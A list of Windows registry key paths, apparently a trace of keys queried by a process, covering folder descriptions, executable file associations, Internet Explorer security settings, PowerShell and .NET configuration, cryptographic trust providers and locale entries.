HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\WScript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\WScript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\InheritConsoleHandles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PowerShell.exe\AppendPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PowerShell.exe\PATH
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c644-6060-11ed-bf52-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c644-6060-11ed-bf52-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\PowerShellVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\RuntimeVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\ConsoleHostAssemblyName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\NetFrameworkV4IsInstalled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index165
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\ServiceStackVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine\ApplicationBase
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\State
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\Safety Warning Level
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription\EnableTranscripting
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription\OutputDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription\EnableInvocationHeader
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\TZI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\MUI_Display
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\MUI_Std
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Singapore Standard Time\MUI_Dlt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\FeatureSIMD
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment\PSMODULEPATH
HKEY_CURRENT_USER\Environment\PSMODULEPATH
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ar
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ar
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ar-SA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ar-SA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bg-BG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bg-BG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ca
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ca
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ca-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ca-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cs-CZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cs-CZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\da
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\da
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\da-DK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\da-DK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\de
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\de
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\de-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\de-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\el
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\el
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\el-GR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\el-GR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fi-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fi-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\he
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\he
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\he-IL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\he-IL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hu
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hu-HU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hu-HU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\is
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\is
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\is-IS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\is-IS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ja
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ja
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ja-JP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ja-JP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ko
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ko
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ko-KR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ko-KR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nl-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nl-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\no
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\no
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nb-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nb-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pl-PL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pl-PL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt-BR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt-BR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\rm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\rm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\rm-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\rm-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ro
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ro
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ro-RO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ro-RO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ru
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ru
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ru-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ru-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hr-HR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hr-HR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sk
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sk-SK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sk-SK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sq
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sq
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sq-AL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sq-AL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sv-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sv-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\th
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\th
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\th-TH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\th-TH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tr-TR
